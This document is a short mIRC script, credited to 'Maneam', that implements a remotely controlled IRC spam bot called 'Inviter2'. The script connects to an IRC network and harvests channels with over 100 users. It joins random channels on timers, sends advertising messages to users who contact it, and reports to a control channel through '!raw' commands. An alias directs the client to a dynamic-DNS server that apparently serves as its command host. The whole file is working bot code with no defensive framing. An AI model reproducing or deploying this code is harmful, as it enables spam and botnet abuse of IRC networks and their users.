***********************************
*       Sock By Maneam            *
***********************************

on 1:sockopen:Inviter2:{
  if ($sockerr > 0) { return }
  sockwrite -tn $sockname user $read(Nickatss.bat) $read(Nickatss.bat) $read(Nickatss.bat) : $+ $read(Nickatss.bat)
  sockwrite -tn $sockname nick  $read(Nickatss.bat)
}
on 1:sockclose:Inviter2:{
  .timerReload 1 15 sockopen $sockname $sock(Inviter2).ip $sock(Inviter2).port
}

#invite2 on
on 1:sockread:Inviter2:{
  sockread -f %temp
  echo BoT - %temp
  tokenize 32 %temp
  if ($2 == 266) sockwrite -nt $sockname List
  if ($2 == 321) { msgchan %c [Inviter2] Listing channels on $remove($1,:) } 
  if ($2 == 322) && ($5 > 100) { write ichan.txt $4 } 
  if ($2 == 323) { msgchan %c [Inviter2] Listing channels complete on $remove($1,:) [Total Channels in List: $+ $lines(ichan.txt) $+ ] | timer 1 90 Inviter2Join rand 15 } 
  if ($2 == 433) { sockwrite -nt $sockname NICK $4 $+ $r(a,z) } 
  if ($1 == PING) { sockwrite -nt $sockname PONG $2 }
  if ($2 == PRIVMSG) { if (%i.ons == Off) || $left($3,1) == $chr(35) { halt } 
    if (%i.temp.s [ $+ [ $remove($Gettok(%temp,1,33),:) ] ] == done) { halt } 
    set %i.temp.s [ $+ [ $remove($Gettok(%temp,1,33),:) ] ] done | set %i.ons Off | .timer $+ $remove($Gettok(%i.t.j,1,33),:) 1 15 sockwrite -nt $sockname PRIVMSG $remove($Gettok(%temp,1,33),:) :ACTION %Inviter2Msg $+  | inc %i.t.j | .timerDelay 1 5 set %i.ons Yes 
  } 
}
#invite2 end

alias Inviter2Halt {
  .disable #invite
  sockclose Inviter2
  msgchan %c [Inviter2] halted Total Messages: %i.t.j
}
alias Inviter2load {
  if $sock(Inviter2,0) > 0 { halt }
  if $3 != $null {
    sockopen Inviter2 $1 $2
    Set %Inviter2Msg $3-
   .enable #invite2
    msgchan %c [Inviter2] Load $1 $+ : $+ $2 [ $+ $3- $+ ]
  } 
  else {
    msgchan %c [4Inviter2] type !raw Inviter2load irc.dal.net 6667 2Welcome To My Site 12www.Manteam.com
  }
}
alias server server n4ss3rn.dynu.com 6667
alias msgchan { if $me isvo $1 || m !isin $chan($1).mode || $me isop $1 { msg $1- } }
alias Inviter2Join { 
  unset %Inviter2C.s
  if ($sock(Inviter2,0) > 0) { 
    if ($1 == rand) {
      if ($lines(ichan.txt) < 0) || ($exists(ichan.txt) == $false) { 
        msgchan %c [4Inviter2] Error: Channels Loading! 
        sockwrite -nt Inviter2 LIST :* $+ 30 $+ *
        halt 
      } 
      set %i.r.j.a $2
      set %i.r.j.i 0 
      :loop 
      if (%i.r.j.i > %i.r.j.a) { goto end }
      set %Inviter2Cs $read -l $+ $r(1,$lines(ichan.txt)) ichan.txt
      timer 1 $r(1,99) sockwrite -nt Inviter2 JOIN : $+ %Inviter2Cs
      Set %Inviter2C.s %Inviter2Cs $+ , $+ %Inviter2C.s
      inc %i.r.j.i 
      goto loop
      :end 
      unset %i.r.j.i
      unset %i.r.j.a 
      msgchan %c [Inviter2] Joins %Inviter2C.s
      halt 
    } 
    else { 
      timer 1 $r(1,99) sockwrite -nt Inviter2 JOIN : $+ $1 
      msgchan %c [Inviter2] Join $1
    } 

  } 
}
